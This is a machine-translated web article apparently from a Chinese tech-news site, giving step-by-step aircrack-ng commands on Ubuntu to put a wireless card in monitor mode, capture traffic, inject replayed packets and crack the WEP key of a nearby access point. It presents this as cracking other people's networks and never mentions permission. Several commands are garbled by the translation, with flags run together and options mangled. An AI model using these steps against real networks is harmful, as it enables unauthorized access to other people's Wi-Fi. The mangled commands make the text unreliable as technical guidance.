Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to install Ubuntu aircrack-ng

2025-02-28 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >

Share

Shulou(Shulou.com)06/01 Report--

This article mainly introduces how to install Ubuntu aircrack-ng. It is very detailed and has a certain reference value. Friends who are interested must finish it!

One: installation of Ubuntu and aircrack-ng

1. Make sure to install the most recent or newer Ubuntu aircrack-ng system.

two。 Install Ubuntu aircrack-ng, terminal: after the sudo apt-get install aircrack-ng preparation work is done, the following can be easily cracked.

Second, the cracking process

1. First of all, determine whether there is a wireless network card port of wlan0, and ifconfig will know. If there is a terminal input sudo airmon-ng start wlan0 to start the monitoring mode of the wireless network card.

2. Enter sudo airodump-ng mon0 in the terminal, and after starting the monitoring mode, the wireless port is mon0 (if you start it many times, it will add up the numbers), see which AP encrypted by wep are online, and then press ctrl+c to exit and keep the terminal.

3. Open another terminal, enter sudo airodump-ng-c 6-- bssid AP's MAC-w wep mon0 (the 6 after-c is the AP working channel,-the AP's MAC behind bissid is to crack the MAC address of AP, and the wep after-w is the file name of the captured packet DATA (you can name it casually), and then enter and start to grab the package.

4. Open another terminal and enter sudo aireplay-ng-10-an AP's MAC-h My MAC mon0 to establish a virtual connection with AP (- h followed by My MAC is the MAC address of your wireless network card)

5. After the virtual connection is successfully established, enter sudo aireplay-ng-2-F-p 0841-c ff:ff:ff:ff:ff:ff-b AP's MAC-h My MAC mon0 for injection, and now the packets should continue to grow in step 3.

6. After collecting more than 5000 DATA, open another terminal and enter sudo aircrack-ng wep*.cap to decrypt it (if not calculated, continue to wait, Ubuntu aircrack-ng will automatically run again after each additional 5000 DATA until the password is calculated to)

7. After cracking the password, enter sudo airmon-ng stop mon0 in the terminal to turn off the monitoring mode, otherwise the wireless network card will always be injected into the AP. It is not possible to exit or close the terminal directly with ctrl+c, unless the computer is restarted.

8. If there is no accident, you should be happy to see KEY foundation, or repeatedly gather 1-7 steps to crack other AP. Next, I believe you will. But be careful not to be too arrogant and adhere to the principle of simple sharing happiness.

These are all the contents of the article "how to install Ubuntu aircrack-ng". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Servers

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report